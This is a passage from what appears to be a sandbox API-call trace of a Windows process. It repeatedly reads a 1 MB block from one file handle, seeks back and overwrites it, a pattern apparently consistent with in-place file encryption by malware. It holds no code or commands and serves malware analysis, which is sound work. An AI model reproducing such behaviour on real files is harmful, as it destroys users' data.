nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.322] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.322] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.324] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.336] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.336] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.338] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.368] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.368] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.370] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.382] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.382] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.384] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.411] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.411] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.414] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.426] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.426] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.428] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.462] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.463] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.465] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.477] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.477] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.479] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.509] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.510] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.512] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.524] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.524] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.526] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.563] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.563] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.565] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.577] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.577] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.586] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.612] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.613] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.615] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.627] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.627] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.629] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.656] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.656] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.658] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.670] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.670] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.673] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.699] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.699] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.701] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.713] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.713] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.715] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.741] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.741] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.743] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.754] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.754] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.757] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.783] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.784] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.786] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.798] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.798] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.801] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.827] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.827] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.829] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.842] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.842] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.844] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.871] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.871] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.874] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.886] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.886] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.889] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.962] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.962] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.964] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0075.980] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.980] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0075.982] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.011] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.011] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.014] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.026] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.026] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.029] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.056] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.056] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.058] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.070] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.070] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.073] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.088] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.089] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.091] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.103] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.103] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.105] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.117] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.117] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.120] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x100000, lpOverlapped=0x0) returned 1 [0076.132] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.132] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, lpNumberOfBytesWritten=0x3f2e1d8*=0x100000, lpOverlapped=0x0) returned 1 [0076.134] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x60012, lpOverlapped=0x0) returned 1 [0076.144] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xfff9ffee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.144] WriteFile (in: hFile=0x430, lpBuffer=0x4110000*, nNumberOfBytesToWrite=0x60012, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x4110000*, 